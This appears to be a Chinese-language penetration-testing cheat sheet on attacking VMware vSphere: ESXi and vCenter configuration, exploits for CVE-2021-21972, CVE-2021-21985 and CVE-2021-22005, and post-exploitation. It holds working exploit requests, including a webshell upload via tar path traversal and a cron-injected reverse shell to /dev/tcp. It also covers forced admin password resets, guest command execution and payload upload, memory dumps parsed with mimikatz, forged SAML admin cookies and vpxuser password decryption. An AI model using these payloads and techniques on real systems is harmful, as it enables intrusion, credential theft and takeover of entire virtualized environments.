# Vmvare vSphere #### Vmware产品系列 Ø Workstation Pro:面向Windows虚拟化 Ø Fusion for Mac:面向Mac虚拟化 Ø ThinApp:应用虚拟化解决方案 Ø Vmware Enterprise PKS:面向多云企业和服务提供商生产级Kubernetes Ø vSAN:vSphere原生存储,存储虚拟化 Ø vRealize Operations:面向私有云、混合云和多云环境自动驾驶式IT运维维管理平台 Ø Vmware vSphere:服务器虚拟化平台 n Vmware把产品统称为vSphere
vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。 vSphere有两个核心组件: * ESXi * 用于创建并运行虚拟机和虚拟设备的虚拟化平台 * vCenter * 用于管理网络中连接的多个主机,并将主机资源池化。 可以从官网下,但是太麻烦: ```bash #下载站 http://vmv.re/gets vmvre #国内下载 http://42.81.162.1:443/s/Awsw ``` * vCenter Server Appliance(VCSA),用于安装在Linux * Vmware Integrated Management(VIM),用于安装在Windows #### ESXi相关配置 **密码策略** 大小写字母、数字和特殊字符,密码长度大于7小于40 ```bash password requisite /lib/security/$ISA/pam_passwdqc.so retry=3 min=disabled,disabled,disabled,7,7 ``` 默认情况下,10次尝试,锁定15分钟后自动解锁。 默认情况下,ESXi Shell 和 SSH 服务不会运行,只有 root 用户才能登录到直接控制台用户界面 ESXi默认访问不了SSH 管理 --> 服务 --> SSH服务开启 在连接ESXi中,可以看到这台是否已经连接了vCenter
相关命令: ```bash esxcfg-vmknic -l #查看宿主机IP地址 vim-cmd vmsvc/getallvms #列出所有虚拟机 esxcli network firewall get #防火墙状态 esxcli network firewall ruleset list #列出规则信息 esxcli network firewall set --enabled #启用、禁用 ``` [https://blog.51cto.com/u\_4674157/](https://blog.51cto.com/u_4674157/3777054) **重置密码** 场景:拿到WebShell之后,想要登录vCenter,而且密码解不出来,可以强制重置密码。 ```bash #Linux 强制重置SSO administrator密码 /usr/lib/vmware-vmdir/bin/vdcadmintool #Windows 强制重置密码 C:\Program Files\Vmware\vCenter Server\vmdird\vdcadmintool.exe ``` **使用HTTPS PUT SSH密钥** 默认情况下,ESXiShell 和 SSH 服务不会启动,只有 root 用户才能登录到直接控制台用户界面,开启SSH后只允许密钥访问,使用 HTTPS PUT 上传 SSH 密钥。 密钥类型位置: root 用户的授权密钥文件 ```bash https://hostname_or_IP_address/host/ssh_root_authorized_keys ``` 您必须对主机具有完全管理员特权才可上载此文件。 ```bash DSA 密钥 https://hostname_or_IP_address/host/ssh_host_dsa_key DSA 公用密钥 https://hostname_or_IP_address/host/ssh_host_dsa_key_pub RSA 密钥 https://hostname_or_IP_address/host/ssh_host_rsa_key RSA 公用密钥 https://hostname_or_IP_address/host/ssh_host_rsa_key_pub ``` esxi 401 认证,是服务器密码,不是前台密码。 {% code overflow="wrap" %} ```bash https://192.168.238.137/host/ #生成密钥 ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa PUT /host/ssh_root_authorized_keys HTTP/1.1 Host: 192.168.238.138 Authorization: Basic cm9vdDoxMjNxd2UhQCMuLi4= Content-Length: 407 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZ4gGhuM9GFeh7Kivi0BmxjLy4Brq9V3AEzPlXoXnHWumFC/FJWmZrHVGgDzBL26o/qsPyHnMffJve6egqyaV05+ULiPOzpjoLmG3+7uhhEKfY7KZ/uDMkmeufhvwTBfIIndARqzuAbsx6ekJb794fBhpOG7hPNcziqs5jRRQf9lLUQgltBfReFf6Tj9j2Ff471HlGaVdwKyGp4T3oKpH4K7kgdarMoh1KT2bC9ijHD1TpdQLfNjKJ+uXccaWWG7eEQCYmwQtbL80PVVTq5HTkZaqw+BhSRF8ur0NWX9WC3G4r4vYEc46meh1pwowHn69ZWRuvql1I4IfjytL4totH root@localhost.localdomain ``` {% endcode %} #### 漏洞利用 Ø 查看Vcenter版本信息:/sdk/vimServiceVersions.xml **CVE-2021-21972** 影响范围 Ø VMware vCenter Server 7.0系列 < 7.0.U1c Ø VMware vCenter Server 6.7系列 < 6.7.U3l Ø VMware vCenter Server 6.5系列 < 6.5 U3n Ø VMware ESXi 7.0系列 < ESXi70U1c-17325551 Ø VMware ESXi 6.7系列 < ESXi670-202102401-SG Ø VMware ESXi 6.5系列 < ESXi650-202102101-SG **Windowst利用** Windows vCenter程序路径: {% code overflow="wrap" %} ```bash ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport #构造tar包 https://github.com/ptoomey3/evilarc/blob/master/evilarc.py python evilarc.py -d 2 -p 'ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport' -o win -f winexpl.tar winshe.jsp ``` {% endcode %} ```bash POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1 Host: 192.168.238.132 Cookie: VSPHERE-USERNAME=Administrator%40VSPHERE.LOCAL; VSPHERE-CLIENT-SESSION-INDEX=_f97bb91caea8a2af952cd91ec5d47eb8; VSPHERE-UI-JSESSIONID=0C5DAAED678BDADE5DE0A9599359A141; VSPHERE-UI-XSRF-TOKEN=059001d4-15b3-4ab5-b83f-604c37fb2471; style=light Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1YoXljo9 Content-Length: 10389 ------WebKitFormBoundary1YoXljo9 Content-Disposition: form-data; name="uploadFile"; filename="winexpl.tar" Paste from file winexpl.tar ------WebKitFormBoundary1YoXljo9-- ``` **Linux利用** 【如果不成功,尝试本地创建vsphere-ui之后再生成密钥】 {% code overflow="wrap" %} ```bash python evilarc.py -d 2 -p 'home/vsphere-ui/.ssh' -o unix -f unixshe.tar authorized_keys ssh vsphere-ui@Your IP #需要重启 /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/ Linux Shell的路径:https://photom-matchine/ui/resources/winshe.jsp 如果不行使用(脚本有问题,要重新写): https://github.com/NS-Sp4ce/CVE-2021-21972/blob/7048b1d0a71a862284c2d54f78aba913ccef5776/CVE-2021-21972.py https://0x20h.com/p/7cb6 ``` {% endcode %} **CVE-2021-21985** Ø vCenter Server 6.5 Ø vCenter Server 6.7 Ø vCenter Server 7.0 Ø Cloud Foundation (vCenter Server) 3.x Ø Cloud Foundation (vCenter Server) 4.x 只有Linux ```bash java -jar JNDIInjection-Bypass.jar 1099 192.168.238.1 8841 nc -lvp 8841 python3 CVE-2021-21985_exp.py https://192.168.238.149 rmi://192.168.238.146:1099/Exploit ``` **CVE-2021-22005** 影响版本: 7.0,6.7,6.5,4.x,3.x (EXP) ```bash POST /analytics/telemetry/ph/api/hyper/send?_c=e&_i=/ce21 HTTP/1.1 Host: 192.168.23.119 Content-Length: 60 {"aaa":"bbb"} ``` {% code overflow="wrap" %} ```bash POST /analytics/telemetry/ph/api/hyper/send?_c=e&_i=/../../../../../../../../../../../../etc/cron.d/cs21 HTTP/1.1 Host: 192.168.23.119 Content-Length: 60 */1 * * * * root bash -i >& /dev/tcp/192.168.23.77/8091 0>&1 ``` {% endcode %} **vCenter < 6.0 S2-045** ```bash #老版本Struts S2-045 https://vmware/statsreport/vmHome.do ``` #### 后渗透利用 以下一切操作的前提都需要权限 拿到密码后可利用: Ø 读取虚拟机的配置 Ø 查看虚拟机文件 Ø 删除虚拟机文件 Ø 向虚拟机上传文件 Ø 从虚拟机下载文件 Ø 在虚拟机中执行命令 在旧的REST API(低于vSphere7.0U2)不支持以下操作: Ø 查看虚拟机文件 Ø 删除虚拟机文件 Ø 向虚拟机上传文件 Ø 从虚拟机下载文件 Ø 在虚拟机中执行命令 **SharpSphere** {% code overflow="wrap" %} ```bash #无法编译时: 工具 --> NuGet包管理器 --> 程序包源 --> 加更新源:https://api.nuget.org/v3/index.json #获取信息 SharpSphere.exe list --url https://192.168.238.138/sdk/ --username root --password 123qwe!@# [x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates [x] Creating vSphere API interface [x] Connected to VMware ESXi 6.7.0 build-15160138 [x] Authenticating with provided username and password [x] Successfully authenticated Name: Centos7 | Power: poweredOn | OS: CentOS 7 (64-bit) | Tools: guestToolsUnmanaged | IP: 192.168.238.139 #Execute .\SharpSphere.exe execute --url https://192.168.238.138/sdk --username root --password 123qwe!@# --ip 192.168.238.141 --guestusername administrator --guestpassword 123qwe!@# --command whoami --output #Upload FIle .\SharpSphere.exe upload --url https://192.168.238.138/sdk --username root --password 123qwe!@# --ip 192.168.238.141 --guestusername administrator --guestpassword 123qwe!@# --source D:\calc.exe --destination C:\Users\Public\payload.exe #DOwnload FIle Z:\>SharpSphere.exe download --url https://URL/sdk --username administrator@vsphere.local --password --ip --guestusername James --guestpassword --source C:\Users\Public\payload.exe --destination Z:\result.exe ``` {% endcode %} **Dump内存获取密码** {% code overflow="wrap" %} ```bash #Dump,目前ESXi有问题,无法下载文件,但在vCenter可以成功 .\SharpSphere.exe dump --url https://192.168.238.138/sdk/ --username root --password 123qwe!@# --targetvm "Win2008" --destination "C:\Users\Public\" --snapshot #下载快照后缀为vmsn、vmem .\vmss2core-sb-8456865.exe -W .\Win2008-Snapshot5.vmsn .\Win2008-Snapshot5.vmem #Microsoft Windows 8/8.1, Windows Server 2012, Windows Server 2016 or Windows Server 2019 run this command: vmss2core.exe -W8 virtual_machine_name.vmsn virtual_machine_name.vmem #使用Windbg PreView加载内存 https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-install-preview #内部加载mimilib kd> .load C:\Users\A\Desktop\vmnx\mimikatz_trunk\x64\mimilib.dll #查看lsass进程 kd> !process 0 0 lsass.exe 切换到该进程中 kd> .process /r /p fffffa80028f2400 #抓取内存密码 kd> !mimikatz ``` {% endcode %} ![](https://2774253028-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LxZ3g61O4Qp4qY2guHB%2Fuploads%2FPfHtYlsmZO9g8nuiSdSn%2Fimage.png?alt=media\&token=3960dc01-9c30-4d06-abe6-da3088aae462) **扩展:qcow2后缀** ```bash #只读方式打开虚拟磁盘 guestfish --ro -a /var/lib/libvirt/images/centos7.qcow2 > run #扫描 > list-filesystems #列出文件系统 > mount /dev/centos/root / #挂载目录 > cat /etc/shadow #实现自动探查后自动挂载 guestfish --ro -a /var/lib/libvirt/images/centos7.qcow2 -i ``` **PySharpSphere** 此工具是通过pyVmomi来实现 {% code overflow="wrap" %} ```bash #list pysharpsphere.exe -H 192.168.238.132 -u administrator@vsphere.local -p #jLuNK5[z(,0p6K9Xj7C list #执行命令 pysharpsphere.exe -H 192.168.100.49 -u administrator@vsphere.local -p password execute -t vm-1020 --guest-user administrator --guest-pass guestpassword -c whoami #上传文件 pysharpsphere.exe -H 192.168.100.49 -u administrator@vsphere.local -p password upload -t vm-1020 --guest-user administrator --guest-pass guestpassword --source /tmp/test.exe --dest C:\\c2.exe #获取镜像快照 pysharpsphere.exe -H 192.168.100.49 -u administrator@vsphere.local -p password dump -t vm-1020 #通过NTLM执行命令 pysharpsphere.exe -H 192.168.100.49 -u administrator@vsphere.local -p password execute -t vm-1015 --guest-user administrator --guest-ntlm ea41383fa39c20f186cbcdc0ac234417 -c whoami ``` {% endcode %} 实际上只要登录到vCenter界面都可以操作: 创建快照 --> 数据存储 --> 下载快照 ![](https://2774253028-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LxZ3g61O4Qp4qY2guHB%2Fuploads%2F9Mcsjt9GQdNmpbpFJF6a%2Fimage.png?alt=media\&token=f2316116-2126-46f3-8acc-0b8dcfdc9626) **PowerCLI** 官方文档 : {% code overflow="wrap" %} ```bash #离线安装 下载PowerCLI的Zip文件,地址如下: https://code.vmware.com/doc/preview?id=13693 #获取路径,将PowerCLI的Zip文件解压至该目录 $env:PSModulePath #判断是否有安装成功 Get-Module -Name VMware.PowerCLI -ListAvailable #远程执行策略允许 Set-ExecutionPolicy RemoteSigned #忽略证书验证 Set-PowerCLIConfiguration -Scope AllUsers -ParticipateInCeip $false -InvalidCertificateAction Ignore #连接服务器 Connect-VIServer -Server 192.168.238.149 -Protocol https -User Administrator@GIAO.LOCAL -Password Qazxx!@#... -Force #断开连接 Disconnect-VIServer -Server 192.168.238.149 -Force -Confirm:$false #上传文件 Copy-VMGuestFile -Source c:\text.txt -Destination c:\temp\ -VM VM -LocalToGuest -GuestUser user -GuestPassword pass2 #下载文件 Copy-VMGuestFile -Source c:\text.txt -Destination c:\temp\ -VM VM -GuestToLocal -GuestUser user -GuestPassword pass2 #先通过Get-VM 获取主机名称,之后指定执行命令: Invoke-VMScript -VM "Centos7 (1)" -ScriptText "cat /etc/passwd" -GuestUser root -GuestPassword "123qwe!@#" ``` {% endcode %} ![](https://2774253028-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LxZ3g61O4Qp4qY2guHB%2Fuploads%2Fo08d4435bsva6hJ9EVkp%2Fimage.png?alt=media\&token=af317548-6333-464b-ae54-4f7ee469862e) Windows执行虚拟机命令的前提条件是装了Vmware Tools才能执行命令。 {% code overflow="wrap" %} ```bash Invoke-VMScript -VM "Win2012" -ScriptText "whoami" -GuestUser administrator -GuestPassword "123qwe!@#" ``` {% endcode %}
走的流量是加密
**vCenter SAML Certificates** 拿到WebShell后,不想重置管理员密码的情况下。 读取data.mdb证书信息,通过证书请求获取管理员cookie ```bash Linux: /storage/db/vmware-vmdir/data.mdb Windows: C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200 [*] Successfully extracted the IdP certificate [*] Successfully extracted trusted certificate 1 [*] Successfully extracted trusted certificate 2 [*] Obtaining hostname from vCenter SSL certificate [*] Found hostname vcsa.olympus for 10.0.100.200 [*] Initiating SAML request with 10.0.100.200 [*] Generating SAML assertion [*] Signing the SAML assertion [*] Attempting to log into vCenter with the signed SAML request [+] Successfuly obtained Administrator cookie for 10.0.100.200! [+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640 ``` 访问https\://\/ui的VCSA实例,在/ui路径下添加cookie **解密vpxuser** {% code overflow="wrap" %} ```bash #获取vc用户的密码 cat /etc/vmware-vpx/vcdb.properties #把加密后的密码单独拿出来, psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;" > password.enc #拿解密key cat /etc/vmware-vpx/ssl/symkey.dat Windows:C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\ssl\symkey.dat Linux:/etc/vmware-vpx/ssl/symkey.dat #破解 python decrypt.py symkey.dat password.enc pass.txt ``` {% endcode %}